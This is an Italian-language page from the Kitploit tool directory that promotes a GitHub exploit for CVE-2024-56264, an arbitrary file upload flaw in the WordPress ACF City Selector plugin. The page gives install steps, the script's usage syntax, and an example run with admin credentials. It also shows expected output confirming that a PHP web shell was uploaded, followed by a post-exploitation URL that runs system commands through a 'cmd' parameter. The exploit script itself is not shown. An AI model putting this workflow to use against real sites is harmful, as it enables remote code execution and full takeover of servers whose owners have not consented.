Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-56264 — Plugin WordPress ACF City Selector <= 1.14.0 - Vulnerabilità di caricamento arbitrario di file | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-56264
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-56264

CVE-2024-56264

Plugin WordPress ACF City Selector <= 1.14.0 - Vulnerabilità di caricamento arbitrario di file

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-56264

Exploit per WordPress ACF City Selector - Caricamento Arbitrario di File (CVE-2024-56264)

Panoramica

Questa repository contiene un exploit per CVE-2024-56264, una vulnerabilità di Caricamento Arbitrario di File presente nel plugin WordPress ACF City Selector (versioni <= 1.14.0). Questa vulnerabilità consente a un attaccante di caricare un file PHP dannoso (web shell) su un'istanza WordPress vulnerabile ed eseguire comandi arbitrari sul server.

Dettagli CVE

  • ID CVE: CVE-2024-56264
  • Data di pubblicazione: 2 gennaio 2025
  • Plugin interessato: ACF City Selector
  • Versioni vulnerabili: <= 1.14.0
  • Impatto: Esecuzione di codice in remoto (RCE) tramite caricamento di file senza restrizioni

Descrizione

Il plugin ACF City Selector non riesce a validare correttamente i file caricati, consentendo agli attaccanti di bypassare le restrizioni e caricare file PHP arbitrari. Una volta caricato un file PHP dannoso, un attaccante può eseguire comandi di sistema remotamente, portando al compromissione totale del server.

Requisiti

📌 Dipendenze

Assicurarsi che quanto segue sia installato prima di eseguire lo script:

  • Python 3.x
  • Modulo requests (installabile con: pip install requests)

È possibile installare tutte le dipendenze richieste utilizzando:

root@kitploit:~
pip install -r requirements.txt

🚀 Utilizzo

Esecuzione dell'exploit:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

Plugin WordPress ACF City Selector <= 1.14.0 - Vulnerabilità di caricamento arbitrario di file

opzioni:
  -h, --help           mostra questo messaggio di aiuto ed esci
  --url URL            URL di base del sito web (es., http://192.168.100.74/wordpress)
  --username USERNAME  Nome utente WordPress
  --password PASSWORD  Password WordPress

Esempio:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Output atteso

In caso di sfruttamento riuscito, dovresti vedere:

root@kitploit:~
[+] Versione del plugin rilevata: 1.14.0
[+] Versione vulnerabile rilevata! Procedo con lo sfruttamento.
[+] Accesso effettuato con successo.
[+] Nonce estratto: abc1234
[+] Shell caricata con successo: http://wordpress/wp-content/uploads/acfcs/q.php

Post-sfruttamento

In caso di successo, accedi alla shell caricata tramite:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Questo consente l'esecuzione remota di comandi sul server.

⚠ Disclaimer

Questo script è destinato esclusivamente a scopi didattici e di test di sicurezza autorizzati. L'uso non autorizzato è illegale e può comportare gravi conseguenze. L'autore non è responsabile per qualsiasi uso improprio di questo exploit.

Scarica lo strumento